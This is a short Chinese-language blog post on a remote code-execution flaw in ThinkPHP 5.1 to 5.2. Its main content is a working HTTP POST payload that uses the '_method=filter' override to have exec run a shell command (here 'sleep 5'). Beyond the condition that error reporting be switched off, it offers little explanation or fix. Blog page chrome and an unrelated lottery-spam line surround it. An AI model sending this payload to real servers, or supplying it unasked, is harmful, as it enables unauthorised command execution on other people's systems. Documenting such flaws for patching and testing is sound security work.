?

May 16 2019

Thinkphp5.1 ~ 5.2代碼執行漏洞

首頁 » 漏洞收集 » Thinkphp5.1 ~ 5.2代碼執行漏洞   

Thinkphp5.1 ~ 5.2 代碼執行漏洞

需要在library/think/Error.php中設置:
error_reporting(0);

據作者博客中說的:

本身項目發布就需要屏蔽異常和錯誤所以這個配置是一個正常的配置

http://proxy.boomeye.com:19300/wordpress/index.php/2019/01/15/thinkphp5-1-5-2-rec/
設置前(默認情況下):

error_reporting(E_ALL);

1.png


設置后:

2.png

3.png


payload:


POST /thinkphp-5.1.29/html/public/index.php HTTP/1.1 
Host: 192.168.96.129 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

Connection: close c=exec&f=sleep%205&_method=filter 



正文部分到此結束

文章標簽: thinkphp漏洞

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «如何低成本搭建dnslog服務器 | 域滲透(提權篇)»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖